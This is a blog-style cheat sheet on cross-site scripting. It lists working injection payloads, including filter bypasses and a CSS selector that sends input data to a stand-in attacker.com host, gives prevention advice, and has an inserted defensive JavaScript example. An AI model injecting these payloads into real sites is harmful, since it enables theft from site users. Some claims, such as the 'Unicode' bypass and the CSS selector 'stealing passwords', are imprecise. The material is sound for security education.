Cross-Site Scripting (XSS) Cheat Sheet: A Comprehensive Guide

Introduction to XSS Attacks

Cross-Site Scripting (XSS) is a common web security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. These attacks occur when an application includes untrusted data in a page without proper validation or output encoding, enabling an attacker to execute scripts in a victim's browser.

This cheat sheet covers various XSS attack techniques, including HTML tricks, CSS exploits, JavaScript injections, and event handlers. Whether you’re a developer, security researcher, or ethical hacker, understanding these vectors helps in securing web applications.


Types of XSS Attacks

There are three main types of XSS attacks:

  1. Persistent (Stored) XSS
  • Malicious script is permanently stored on the target server (e.g., in a database).
  • Example: Injecting a script in a comment field that executes for all users.
  2. Non-Persistent (Reflected) XSS
  • The attack is reflected off a web server (e.g., via a malicious URL).
  • Example: Crafting a phishing link that executes JavaScript when clicked.
  3. DOM-Based XSS
  • The vulnerability exists in client-side code rather than server-side.
  • Example: Manipulating JavaScript to alter the DOM and execute malicious code.

Common XSS Attack Vectors

1. Basic HTML Injection

<script>alert("XSS")</script>
  • Executes a simple alert box.

2. Image Tag XSS

<img src="x" onerror="alert('XSS')">
  • Triggers JavaScript when the image fails to load.

3. SVG-Based XSS

<svg onload="alert('XSS')"></svg>
  • Uses SVG’s onload event to execute JavaScript.

4. JavaScript Protocol in Links

<a href="javascript:alert('XSS')">Click Me</a>
  • Runs JavaScript when the link is clicked.

5. Iframe Injection

<iframe src="javascript:alert('XSS')"></iframe>
  • Embeds malicious JavaScript in an iframe.

Advanced XSS Techniques

1. Bypassing Filters with Unicode

<IMG SRC=javascript:alert('XSS')>
  • Some filters block javascript: but allow variations like JaVaScRiPt:.

2. Using HTML Entities

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;
  • Encodes the javascript: URL as HTML entities so a filter matching the literal string misses it; the browser decodes the entities when it parses the attribute.

3. Event Handlers for XSS

<body onload="alert('XSS')">
  • Triggers JavaScript when the page loads.

4. CSS-Based XSS

<style>input[value^="a"] { background: url("//attacker.com/steal?a"); }</style>
  • Steals password inputs via CSS attribute selectors.

5. DOM-Based XSS via URL Fragments

<script>eval(location.hash.slice(1))</script>
  • Executes JavaScript from the URL hash (#alert(1)).

Preventing XSS Attacks

To defend against XSS, developers should:

  1. Use Output Encoding
  • Encode data before rendering it in HTML (&lt; instead of <).
  2. Implement Content Security Policy (CSP)
  • Restricts inline scripts and external sources.
  3. Sanitize User Input
  • Use libraries like DOMPurify to clean HTML input.
  4. Enable HttpOnly Cookies
  • Prevents JavaScript from accessing session cookies.
  5. Validate and Escape Inputs
  • Apply strict input validation and escape special characters.
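As an added example (not part of the original cheat sheet), the following JavaScript implements two of these defences, HTML output encoding and a scheme allowlist for user-supplied links, and shows how they neutralise the script, image-tag and javascript: payloads listed above. The function names and the base URL https://example.invalid/ are my own assumptions; it runs on Node using the built-in WHATWG URL class.

```javascript
// Added example, not code from the original page. Names below are my own.

// Context-aware HTML encoding: every character that can change HTML
// structure becomes an entity, so injected markup renders as plain text.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Scheme allowlist for user-supplied links. The WHATWG URL parser lowercases
// the scheme and strips leading whitespace and embedded tab/newline
// characters, so "JaVaScRiPt:" and " java\tscript:" are still recognised
// as javascript: and rejected. Anything else becomes an inert "#".
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
function safeHref(untrusted) {
  let parsed;
  try {
    // Constructed base (assumption): relative links resolve against the site.
    parsed = new URL(String(untrusted), 'https://example.invalid/');
  } catch (e) {
    return '#'; // unparseable input is neutralised rather than reflected
  }
  return SAFE_SCHEMES.has(parsed.protocol) ? parsed.href : '#';
}

// Stored-XSS scenario: render an untrusted comment as inert HTML.
// The href is first scheme-checked, then attribute-encoded, so even an
// entity-encoded payload (&#106;...) is emitted as literal "&amp;#106;...".
function renderComment(author, text, link) {
  return `<p><a href="${escapeHtml(safeHref(link))}">` +
         `${escapeHtml(author)}</a>: ${escapeHtml(text)}</p>`;
}

// Constructed sample input reusing payloads from the cheat sheet above.
const sample = renderComment(
  'Bob',
  '<img src="x" onerror="alert(\'XSS\')">',
  "JaVaScRiPt:alert('XSS')",
);
console.log(sample);
```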

Conclusion

XSS attacks remain a critical threat to web security. By understanding attack vectors and implementing robust defenses, developers can protect users from malicious scripts. Always test applications for vulnerabilities using ethical hacking techniques and stay updated with security best practices.

For more security insights, follow our blog and explore penetration testing tools like Burp Suite and OWASP ZAP.

🔐 Stay Secure, Stay Safe 🔐